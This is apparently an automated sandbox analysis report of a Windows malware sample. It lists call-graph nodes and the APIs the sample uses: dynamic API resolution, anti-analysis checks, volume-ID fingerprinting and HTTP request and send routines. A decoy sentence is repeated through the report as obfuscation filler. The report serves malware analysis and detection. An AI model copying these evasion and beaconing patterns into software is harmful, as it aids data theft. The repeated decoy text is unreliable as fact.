37034->37035 37036 6b4610 2 API calls 37035->37036 37037 6b3b54 37036->37037 37038 6b4610 2 API calls 37037->37038 37039 6b3b6d 37038->37039 37040 6b4610 2 API calls 37039->37040 37041 6b3b86 37040->37041 37042 6b4610 2 API calls 37041->37042 37043 6b3b9f 37042->37043 37044 6b4610 2 API calls 37043->37044 37045 6b3bb8 37044->37045 37046 6b4610 2 API calls 37045->37046 37047 6b3bd1 37046->37047 37048 6b4610 2 API calls 37047->37048 37049 6b3bea 37048->37049 37050 6b4610 2 API calls 37049->37050 37051 6b3c03 37050->37051 37052 6b4610 2 API calls 37051->37052 37053 6b3c1c 37052->37053 37054 6b4610 2 API calls 37053->37054 37055 6b3c35 37054->37055 37056 6b4610 2 API calls 37055->37056 37057 6b3c4e 37056->37057 37058 6b4610 2 API calls 37057->37058 37059 6b3c67 37058->37059 37060 6b4610 2 API calls 37059->37060 37061 6b3c80 37060->37061 37062 6b4610 2 API calls 37061->37062 37063 6b3c99 37062->37063 37064 6b4610 2 API calls 37063->37064 37065 6b3cb2 37064->37065 37066 6b4610 2 API calls 37065->37066 37067 6b3ccb 37066->37067 37068 6b4610 2 API calls 37067->37068 37069 6b3ce4 37068->37069 37070 6b4610 2 API calls 37069->37070 37071 6b3cfd 37070->37071 37072 6b4610 2 API calls 37071->37072 37073 6b3d16 37072->37073 37074 6b4610 2 API calls 37073->37074 37075 6b3d2f 37074->37075 37076 6b4610 2 API calls 37075->37076 37077 6b3d48 37076->37077 37078 6b4610 2 API calls 37077->37078 37079 6b3d61 37078->37079 37080 6b4610 2 API calls 37079->37080 37081 6b3d7a 37080->37081 37082 6b4610 2 API calls 37081->37082 37083 6b3d93 37082->37083 37084 6b4610 2 API calls 37083->37084 37085 6b3dac 37084->37085 37086 6b4610 2 API calls 37085->37086 37087 6b3dc5 37086->37087 37088 6b4610 2 API calls 37087->37088 37089 6b3dde 37088->37089 37090 6b4610 2 API calls 37089->37090 37091 6b3df7 37090->37091 37092 6b4610 2 API calls 37091->37092 37093 6b3e10 37092->37093 37094 6b4610 2 API calls 37093->37094 37095 6b3e29 37094->37095 37096 6b4610 2 API calls 37095->37096 37097 6b3e42 37096->37097 37098 6b4610 2 API calls 37097->37098 37099 6b3e5b 37098->37099 37100 6b4610 2 API calls 37099->37100 37101 6b3e74 37100->37101 37102 6b4610 2 API calls 37101->37102 37103 6b3e8d 37102->37103 37104 6b4610 2 API calls 37103->37104 37105 6b3ea6 37104->37105 37106 6b4610 2 API calls 37105->37106 37107 6b3ebf 37106->37107 37108 6b4610 2 API calls 37107->37108 37109 6b3ed8 37108->37109 37110 6b4610 2 API calls 37109->37110 37111 6b3ef1 37110->37111 37112 6b4610 2 API calls 37111->37112 37113 6b3f0a 37112->37113 37114 6b4610 2 API calls 37113->37114 37115 6b3f23 37114->37115 37116 6b4610 2 API calls 37115->37116 37117 6b3f3c 37116->37117 37118 6b4610 2 API calls 37117->37118 37119 6b3f55 37118->37119 37120 6b4610 2 API calls 37119->37120 37121 6b3f6e 37120->37121 37122 6b4610 2 API calls 37121->37122 37123 6b3f87 37122->37123 37124 6b4610 2 API calls 37123->37124 37125 6b3fa0 37124->37125 37126 6b4610 2 API calls 37125->37126 37127 6b3fb9 37126->37127 37128 6b4610 2 API calls 37127->37128 37129 6b3fd2 37128->37129 37130 6b4610 2 API calls 37129->37130 37131 6b3feb 37130->37131 37132 6b4610 2 API calls 37131->37132 37133 6b4004 37132->37133 37134 6b4610 2 API calls 37133->37134 37135 6b401d 37134->37135 37136 6b4610 2 API calls 37135->37136 37137 6b4036 37136->37137 37138 6b4610 2 API calls 37137->37138 37139 6b404f 37138->37139 37140 6b4610 2 API calls 37139->37140 37141 6b4068 37140->37141 37142 6b4610 2 API calls 37141->37142 37143 6b4081 37142->37143 37144 6b4610 2 API calls 37143->37144 37145 6b409a 37144->37145 37146 6b4610 2 API calls 37145->37146 37147 6b40b3 37146->37147 37148 6b4610 2 API calls 37147->37148 37149 6b40cc 37148->37149 37150 6b4610 2 API calls 37149->37150 37151 6b40e5 37150->37151 37152 6b4610 2 API calls 37151->37152 37153 6b40fe 37152->37153 37154 6b4610 2 API calls 37153->37154 37155 6b4117 37154->37155 37156 6b4610 2 API calls 37155->37156 37157 6b4130 37156->37157 37158 6b4610 2 API calls 37157->37158 37159 6b4149 37158->37159 37160 6b4610 2 API calls 37159->37160 37161 6b4162 37160->37161 37162 6b4610 2 API calls 37161->37162 37163 6b417b 37162->37163 37164 6b4610 2 API calls 37163->37164 37165 6b4194 37164->37165 37166 6b4610 2 API calls 37165->37166 37167 6b41ad 37166->37167 37168 6b4610 2 API calls 37167->37168 37169 6b41c6 37168->37169 37170 6b4610 2 API calls 37169->37170 37171 6b41df 37170->37171 37172 6b4610 2 API calls 37171->37172 37173 6b41f8 37172->37173 37174 6b4610 2 API calls 37173->37174 37175 6b4211 37174->37175 37176 6b4610 2 API calls 37175->37176 37177 6b422a 37176->37177 37178 6b4610 2 API calls 37177->37178 37179 6b4243 37178->37179 37180 6b4610 2 API calls 37179->37180 37181 6b425c 37180->37181 37182 6b4610 2 API calls 37181->37182 37183 6b4275 37182->37183 37184 6b4610 2 API calls 37183->37184 37185 6b428e 37184->37185 37186 6b4610 2 API calls 37185->37186 37187 6b42a7 37186->37187 37188 6b4610 2 API calls 37187->37188 37189 6b42c0 37188->37189 37190 6b4610 2 API calls 37189->37190 37191 6b42d9 37190->37191 37192 6b4610 2 API calls 37191->37192 37193 6b42f2 37192->37193 37194 6b4610 2 API calls 37193->37194 37195 6b430b 37194->37195 37196 6b4610 2 API calls 37195->37196 37197 6b4324 37196->37197 37198 6b4610 2 API calls 37197->37198 37199 6b433d 37198->37199 37200 6b4610 2 API calls 37199->37200 37201 6b4356 37200->37201 37202 6b4610 2 API calls 37201->37202 37203 6b436f 37202->37203 37204 6b4610 2 API calls 37203->37204 37205 6b4388 37204->37205 37206 6b4610 2 API calls 37205->37206 37207 6b43a1 37206->37207 37208 6b4610 2 API calls 37207->37208 37209 6b43ba 37208->37209 37210 6b4610 2 API calls 37209->37210 37211 6b43d3 37210->37211 37212 6b4610 2 API calls 37211->37212 37213 6b43ec 37212->37213 37214 6b4610 2 API calls 37213->37214 37215 6b4405 37214->37215 37216 6b4610 2 API calls 37215->37216 37217 6b441e 37216->37217 37218 6b4610 2 API calls 37217->37218 37219 6b4437 37218->37219 37220 6b4610 2 API calls 37219->37220 37221 6b4450 37220->37221 37222 6b4610 2 API calls 37221->37222 37223 6b4469 37222->37223 37224 6b4610 2 API calls 37223->37224 37225 6b4482 37224->37225 37226 6b4610 2 API calls 37225->37226 37227 6b449b 37226->37227 37228 6b4610 2 API calls 37227->37228 37229 6b44b4 37228->37229 37230 6b4610 2 API calls 37229->37230 37231 6b44cd 37230->37231 37232 6b4610 2 API calls 37231->37232 37233 6b44e6 37232->37233 37234 6b4610 2 API calls 37233->37234 37235 6b44ff 37234->37235 37236 6b4610 2 API calls 37235->37236 37237 6b4518 37236->37237 37238 6b4610 2 API calls 37237->37238 37239 6b4531 37238->37239 37240 6b4610 2 API calls 37239->37240 37241 6b454a 37240->37241 37242 6b4610 2 API calls 37241->37242 37243 6b4563 37242->37243 37244 6b4610 2 API calls 37243->37244 37245 6b457c 37244->37245 37246 6b4610 2 API calls 37245->37246 37247 6b4595 37246->37247 37248 6b4610 2 API calls 37247->37248 37249 6b45ae 37248->37249 37250 6b4610 2 API calls 37249->37250 37251 6b45c7 37250->37251 37252 6b4610 2 API calls 37251->37252 37253 6b45e0 37252->37253 37254 6b4610 2 API calls 37253->37254 37255 6b45f9 37254->37255 37256 6c9f20 37255->37256 37257 6ca346 8 API calls 37256->37257 37258 6c9f30 43 API calls 37256->37258 37259 6ca3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37257->37259 37260 6ca456 37257->37260 37258->37257 37259->37260 37261 6ca526 37260->37261 37262 6ca463 8 API calls 37260->37262 37263 6ca52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37261->37263 37264 6ca5a8 37261->37264 37262->37261 37263->37264 37265 6ca5b5 6 API calls 37264->37265 37266 6ca647 37264->37266 37265->37266 37267 6ca72f 37266->37267 37268 6ca654 9 API calls 37266->37268 37269 6ca738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37267->37269 37270 6ca7b2 37267->37270 37268->37267 37269->37270 37271 6ca7ec 37270->37271 37272 6ca7bb GetProcAddress GetProcAddress 37270->37272 37273 6ca825 37271->37273 37274 6ca7f5 GetProcAddress GetProcAddress 37271->37274 37272->37271 37275 6ca922 37273->37275 37276 6ca832 10 API calls 37273->37276 37274->37273 37277 6ca98d 37275->37277 37278 6ca92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37275->37278 37276->37275 37279 6ca9ae 37277->37279 37280 6ca996 GetProcAddress 37277->37280 37278->37277 37281 6c5ef3 37279->37281 37282 6ca9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37279->37282 37280->37279 37283 6b1590 37281->37283 37282->37281 37553 6b16b0 37283->37553 37286 6caab0 lstrcpy 37287 6b15b5 37286->37287 37288 6caab0 lstrcpy 37287->37288 37289 6b15c7 37288->37289 37290 6caab0 lstrcpy 37289->37290 37291 6b15d9 37290->37291 37292 6caab0 lstrcpy 37291->37292 37293 6b1663 37292->37293 37294 6c5760 37293->37294 37295 6c5771 37294->37295 37296 6cab30 2 API calls 37295->37296 37297 6c577e 37296->37297 37298 6cab30 2 API calls 37297->37298 37299 6c578b 37298->37299 37300 6cab30 2 API calls 37299->37300 37301 6c5798 37300->37301 37302 6caa50 lstrcpy 37301->37302 37303 6c57a5 37302->37303 37304 6caa50 lstrcpy 37303->37304 37305 6c57b2 37304->37305 37306 6caa50 lstrcpy 37305->37306 37307 6c57bf 37306->37307 37308 6caa50 lstrcpy 37307->37308 37347 6c57cc 37308->37347 37309 6c5510 25 API calls 37309->37347 37310 6c5440 20 API calls 37310->37347 37311 6c5893 StrCmpCA 37311->37347 37312 6c58f0 StrCmpCA 37314 6c5a2c 37312->37314 37312->37347 37313 6caab0 lstrcpy 37313->37347 37315 6cabb0 lstrcpy 37314->37315 37316 6c5a38 37315->37316 37317 6cab30 2 API calls 37316->37317 37320 6c5a46 37317->37320 37318 6caa50 lstrcpy 37318->37347 37319 6cab30 lstrlen lstrcpy 37319->37347 37322 6cab30 2 API calls 37320->37322 37321 6c5aa6 StrCmpCA 37323 6c5be1 37321->37323 37321->37347 37325 6c5a55 37322->37325 37324 6cabb0 lstrcpy 37323->37324 37326 6c5bed 37324->37326 37327 6b16b0 lstrcpy 37325->37327 37328 6cab30 2 API calls 37326->37328 37344 6c5a61 37327->37344 37329 6c5bfb 37328->37329 37331 6cab30 2 API calls 37329->37331 37330 6c5c5b StrCmpCA 37332 6c5c78 37330->37332 37333 6c5c66 Sleep 37330->37333 37335 6c5c0a 37331->37335 37334 6cabb0 lstrcpy 37332->37334 37333->37347 37336 6c5c84 37334->37336 37337 6b16b0 lstrcpy 37335->37337 37338 6cab30 2 API calls 37336->37338 37337->37344 37339 6c5c93 37338->37339 37340 6cab30 2 API calls 37339->37340 37341 6c5ca2 37340->37341 37343 6b16b0 lstrcpy 37341->37343 37342 6c59da StrCmpCA 37342->37347 37343->37344 37344->36401 37345 6b1590 lstrcpy 37345->37347 37346 6c5b8f StrCmpCA 37346->37347 37347->37309 37347->37310 37347->37311 37347->37312 37347->37313 37347->37318 37347->37319 37347->37321 37347->37330 37347->37342 37347->37345 37347->37346 37348 6cabb0 lstrcpy 37347->37348 37348->37347 37350 6c76dc 37349->37350 37351 6c76e3 GetVolumeInformationA 37349->37351 37350->37351 37353 6c7721 37351->37353 37352 6c778c GetProcessHeap RtlAllocateHeap 37354 6c77b8 wsprintfA 37352->37354 37355 6c77a9 37352->37355 37353->37352 37357 6caa50 lstrcpy 37354->37357 37356 6caa50 lstrcpy 37355->37356 37358 6c5ff7 37356->37358 37357->37358 37358->36422 37360 6caab0 lstrcpy 37359->37360 37361 6b48e9 37360->37361 37562 6b4800 37361->37562 37363 6b48f5 37364 6caa50 lstrcpy 37363->37364 37365 6b4927 37364->37365 37366 6caa50 lstrcpy 37365->37366 37367 6b4934 37366->37367 37368 6caa50 lstrcpy 37367->37368 37369 6b4941 37368->37369 37370 6caa50 lstrcpy 37369->37370 37371 6b494e 37370->37371 37372 6caa50 lstrcpy 37371->37372 37373 6b495b InternetOpenA StrCmpCA 37372->37373 37374 6b4994 37373->37374 37375 6b4f1b InternetCloseHandle 37374->37375 37568 6c8cf0 37374->37568 37377 6b4f38 37375->37377 37583 6ba210 CryptStringToBinaryA 37377->37583 37378 6b49b3 37576 6cac30 37378->37576 37381 6b49c6 37383 6cabb0 lstrcpy 37381->37383 37388 6b49cf 37383->37388 37384 6cab30 2 API calls 37385 6b4f55 37384->37385 37387 6cacc0 4 API calls 37385->37387 37386 6b4f77 ctype 37391 6caab0 lstrcpy 37386->37391 37389 6b4f6b 37387->37389 37393 6cacc0 4 API calls 37388->37393 37390 6cabb0 lstrcpy 37389->37390 37390->37386 37392 6b4fa7 37391->37392 37392->36425 37394 6b49f9 37393->37394 37395 6cabb0 lstrcpy 37394->37395 37396 6b4a02 37395->37396 37397 6cacc0 4 API calls 37396->37397 37398 6b4a21 37397->37398 37399 6cabb0 lstrcpy 37398->37399 37400 6b4a2a 37399->37400 37401 6cac30 3 API calls 37400->37401 37402 6b4a48 37401->37402 37403 6cabb0 lstrcpy 37402->37403 37404 6b4a51 37403->37404 37405 6cacc0 4 API calls 37404->37405 37406 6b4a70 37405->37406 37407 6cabb0 lstrcpy 37406->37407 37408 6b4a79 37407->37408 37409 6cacc0 4 API calls 37408->37409 37410 6b4a98 37409->37410 37411 6cabb0 lstrcpy 37410->37411 37412 6b4aa1 37411->37412 37413 6cacc0 4 API calls 37412->37413 37414 6b4acd 37413->37414 37415 6cac30 3 API calls 37414->37415 37416 6b4ad4 37415->37416 37417 6cabb0 lstrcpy 37416->37417 37418 6b4add 37417->37418 37419 6b4af3 InternetConnectA 37418->37419 37419->37375 37420 6b4b23 HttpOpenRequestA 37419->37420 37422 6b4b78 37420->37422 37423 6b4f0e InternetCloseHandle 37420->37423 37424 6cacc0 4 API calls 37422->37424 37423->37375 37425 6b4b8c 37424->37425 37426 6cabb0 lstrcpy 37425->37426 37427 6b4b95 37426->37427 37428 6cac30 3 API calls 37427->37428 37429 6b4bb3 37428->37429 37430 6cabb0 lstrcpy 37429->37430 37431 6b4bbc 37430->37431 37432 6cacc0 4 API calls 37431->37432 37433 6b4bdb 37432->37433 37434 6cabb0 lstrcpy 37433->37434 37435 6b4be4 37434->37435 37436 6cacc0 4 API calls 37435->37436 37437 6b4c05 37436->37437 37438 6cabb0 lstrcpy 37437->37438 37439 6b4c0e 37438->37439 37440 6cacc0 4 API calls 37439->37440 37441 6b4c2e 37440->37441 37442 6cabb0 lstrcpy 37441->37442 37443 6b4c37 37442->37443 37444 6cacc0 4 API calls 37443->37444 37445 6b4c56 37444->37445 37446 6cabb0 lstrcpy 37445->37446 37447 6b4c5f 37446->37447 37448 6cac30 3 API calls 37447->37448 37449 6b4c7d 37448->37449 37450 6cabb0 lstrcpy 37449->37450 37451 6b4c86 37450->37451 37452 6cacc0 4 API calls 37451->37452 37453 6b4ca5 37452->37453 37454 6cabb0 lstrcpy 37453->37454 37455 6b4cae 37454->37455 37456 6cacc0 4 API calls 37455->37456 37457 6b4ccd 37456->37457 37458 6cabb0 lstrcpy 37457->37458 37459 6b4cd6 37458->37459 37460 6cac30 3 API calls 37459->37460 37461 6b4cf4 37460->37461 37462 6cabb0 lstrcpy 37461->37462 37463 6b4cfd 37462->37463 37464 6cacc0 4 API calls 37463->37464 37465 6b4d1c 37464->37465 37466 6cabb0 lstrcpy 37465->37466 37467 6b4d25 37466->37467 37468 6cacc0 4 API calls 37467->37468 37469 6b4d46 37468->37469 37470 6cabb0 lstrcpy 37469->37470 37471 6b4d4f 37470->37471 37472 6cacc0 4 API calls 37471->37472 37473 6b4d6f 37472->37473 37474 6cabb0 lstrcpy 37473->37474 37475 6b4d78 37474->37475 37476 6cacc0 4 API calls 37475->37476 37477 6b4d97 37476->37477 37478 6cabb0 lstrcpy 37477->37478 37479 6b4da0 37478->37479 37480 6cac30 3 API calls 37479->37480 37481 6b4dbe 37480->37481 37482 6cabb0 lstrcpy 37481->37482 37483 6b4dc7 37482->37483 37484 6caa50 lstrcpy 37483->37484 37485 6b4de2 37484->37485 37486 6cac30 3 API calls 37485->37486 37487 6b4e03 37486->37487 37488 6cac30 3 API calls 37487->37488 37489 6b4e0a 37488->37489 37490 6cabb0 lstrcpy 37489->37490 37491 6b4e16 37490->37491 37492 6b4e37 lstrlen 37491->37492 37493 6b4e4a 37492->37493 37494 6b4e53 lstrlen 37493->37494 37582 6cade0 37494->37582 37496 6b4e63 HttpSendRequestA 37497 6b4e82 InternetReadFile 37496->37497 37498 6b4eb7 InternetCloseHandle 37497->37498 37503 6b4eae 37497->37503 37500 6cab10 37498->37500 37500->37423 37501 6cacc0 4 API calls 37501->37503 37502 6cabb0 lstrcpy 37502->37503 37503->37497 37503->37498 37503->37501 37503->37502 37589 6cade0 37504->37589 37506 6c1a14 StrCmpCA 37507 6c1a1f ExitProcess 37506->37507 37518 6c1a27 37506->37518 37508 6c1aad StrCmpCA 37508->37518 37509 6c1acf StrCmpCA 37509->37518 37510 6c1bc0 StrCmpCA 37510->37518 37511 6c1b41 StrCmpCA 37511->37518 37512 6c1ba1 StrCmpCA 37512->37518 37513 6c1b82 StrCmpCA 37513->37518 37514 6c1b63 StrCmpCA 37514->37518 37515 6c1afd StrCmpCA 37515->37518 37516 6c1b1f StrCmpCA 37516->37518 37517 6c1c12 37517->36427 37518->37508 37518->37509 37518->37510 37518->37511 37518->37512 37518->37513 37518->37514 37518->37515 37518->37516 37518->37517 37519 6cab30 lstrlen lstrcpy 37518->37519 37519->37518 37520->36433 37521->36435 37522->36441 37523->36443 37524->36449 37525->36451 37526->36455 37527->36459 37528->36463 37529->36469 37530->36471 37531->36475 37532->36489 37533->36493 37534->36492 37535->36488 37536->36492 37537->36510 37538->36495 37539->36497 37540->36501 37541->36506 37542->36507 37543->36513 37544->36521 37545->36523 37546->36545 37547->36550 37548->36549 37549->36546 37550->36549 37551->36559 37554 6caab0 lstrcpy 37553->37554 37555 6b16c3 37554->37555 37556 6caab0 lstrcpy 37555->37556 37557 6b16d5 37556->37557 37558 6caab0 lstrcpy 37557->37558 37559 6b16e7 37558->37559 37560 6caab0 lstrcpy 37559->37560 37561 6b15a3 37560->37561 37561->37286 37563 6b4816 37562->37563 37564 6b4888 lstrlen 37563->37564 37588 6cade0 37564->37588 37566 6b4898 InternetCrackUrlA 37567 6b48b7 37566->37567 37567->37363 37569 6caa50 lstrcpy 37568->37569 37570 6c8d04 37569->37570 37571 6caa50 lstrcpy 37570->37571 37572 6c8d12 GetSystemTime 37571->37572 37573 6c8d29 37572->37573 37574 6caab0 lstrcpy 37573->37574 37575 6c8d8c 37574->37575 37575->37378 37577 6cac41 37576->37577 37578 6cac98 37577->37578 37580 6cac78 lstrcpy lstrcat 37577->37580 37579 6caab0 lstrcpy 37578->37579 37581 6caca4 37579->37581 37580->37578 37581->37381 37582->37496 37584 6b4f3e 37583->37584 37585 6ba249 LocalAlloc 37583->37585 37584->37384 37584->37386 37585->37584 37586 6ba264 CryptStringToBinaryA 37585->37586 37586->37584 37587 6ba289 LocalFree 37586->37587 37587->37584 37588->37566 37589->37506

                                  Executed Functions

                                  Function 006C9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 6c9bb0-6c9bc4 call 6c9aa0 663 6c9bca-6c9dde call 6c9ad0 GetProcAddress * 21 660->663 664 6c9de3-6c9e42 LoadLibraryA * 5 660->664 663->664 666 6c9e5d-6c9e64 664->666 667 6c9e44-6c9e58 GetProcAddress 664->667 669 6c9e96-6c9e9d 666->669 670 6c9e66-6c9e91 GetProcAddress * 2 666->670 667->666 671 6c9e9f-6c9eb3 GetProcAddress 669->671 672 6c9eb8-6c9ebf 669->672 670->669 671->672 673 6c9ed9-6c9ee0 672->673 674 6c9ec1-6c9ed4 GetProcAddress 672->674 675 6c9f11-6c9f12 673->675 676 6c9ee2-6c9f0c GetProcAddress * 2 673->676 674->673 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01472320), ref: 006C9BF1
                                  • GetProcAddress.KERNEL32(74DD0000,01472350), ref: 006C9C0A
                                  • GetProcAddress.KERNEL32(74DD0000,01472380), ref: 006C9C22
                                  • GetProcAddress.KERNEL32(74DD0000,014724D0), ref: 006C9C3A
                                  • GetProcAddress.KERNEL32(74DD0000,01472398), ref: 006C9C53
                                  • GetProcAddress.KERNEL32(74DD0000,014791D8), ref: 006C9C6B
                                  • GetProcAddress.KERNEL32(74DD0000,01465E50), ref: 006C9C83
                                  • GetProcAddress.KERNEL32(74DD0000,01465BF0), ref: 006C9C9C
                                  • GetProcAddress.KERNEL32(74DD0000,014723B0), ref: 006C9CB4
                                  • GetProcAddress.KERNEL32(74DD0000,014723C8), ref: 006C9CCC
                                  • GetProcAddress.KERNEL32(74DD0000,01472500), ref: 006C9CE5
                                  • GetProcAddress.KERNEL32(74DD0000,014723E0), ref: 006C9CFD
                                  • GetProcAddress.KERNEL32(74DD0000,01465E30), ref: 006C9D15
                                  • GetProcAddress.KERNEL32(74DD0000,01472218), ref: 006C9D2E
                                  • GetProcAddress.KERNEL32(74DD0000,01472248), ref: 006C9D46
                                  • GetProcAddress.KERNEL32(74DD0000,01465AF0), ref: 006C9D5E
                                  • GetProcAddress.KERNEL32(74DD0000,01472428), ref: 006C9D77
                                  • GetProcAddress.KERNEL32(74DD0000,01472440), ref: 006C9D8F
                                  • GetProcAddress.KERNEL32(74DD0000,01465B30), ref: 006C9DA7
                                  • GetProcAddress.KERNEL32(74DD0000,01472290), ref: 006C9DC0
                                  • GetProcAddress.KERNEL32(74DD0000,01465C30), ref: 006C9DD8
                                  • LoadLibraryA.KERNEL32(01472530,?,006C6CA0), ref: 006C9DEA
                                  • LoadLibraryA.KERNEL32(01472548,?,006C6CA0), ref: 006C9DFB
                                  • LoadLibraryA.KERNEL32(014725A8,?,006C6CA0), ref: 006C9E0D
                                  • LoadLibraryA.KERNEL32(01472578,?,006C6CA0), ref: 006C9E1F
                                  • LoadLibraryA.KERNEL32(014725D8,?,006C6CA0), ref: 006C9E30
                                  • GetProcAddress.KERNEL32(75A70000,01472518), ref: 006C9E52
                                  • GetProcAddress.KERNEL32(75290000,01472560), ref: 006C9E73
                                  • GetProcAddress.KERNEL32(75290000,01472590), ref: 006C9E8B
                                  • GetProcAddress.KERNEL32(75BD0000,014725C0), ref: 006C9EAD
                                  • GetProcAddress.KERNEL32(75450000,01465BB0), ref: 006C9ECE
                                  • GetProcAddress.KERNEL32(76E90000,01479178), ref: 006C9EEF
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 006C9F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 006C9EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 47b8776439cef0bc99a26c79833415518bc3bb43beacc8942382ec53c3b7bb5c
                                  • Instruction ID: 3dcd6b084c3a3e603e3176e131321094888a8b36771c86dfff5b289b20621f30
                                  • Opcode Fuzzy Hash: 47b8776439cef0bc99a26c79833415518bc3bb43beacc8942382ec53c3b7bb5c
                                  • Instruction Fuzzy Hash: 67A1EBB653C200DFC344DFE9ED88A56BBA9A74D701720861ABA19C7774D738E940EF60
                                  Function 006B4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 6b4610-6b46e5 RtlAllocateHeap 781 6b46f0-6b46f6 764->781 782 6b479f-6b47f9 VirtualProtect 781->782 783 6b46fc-6b479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B465E
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 006B47EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B478F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4707
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4784
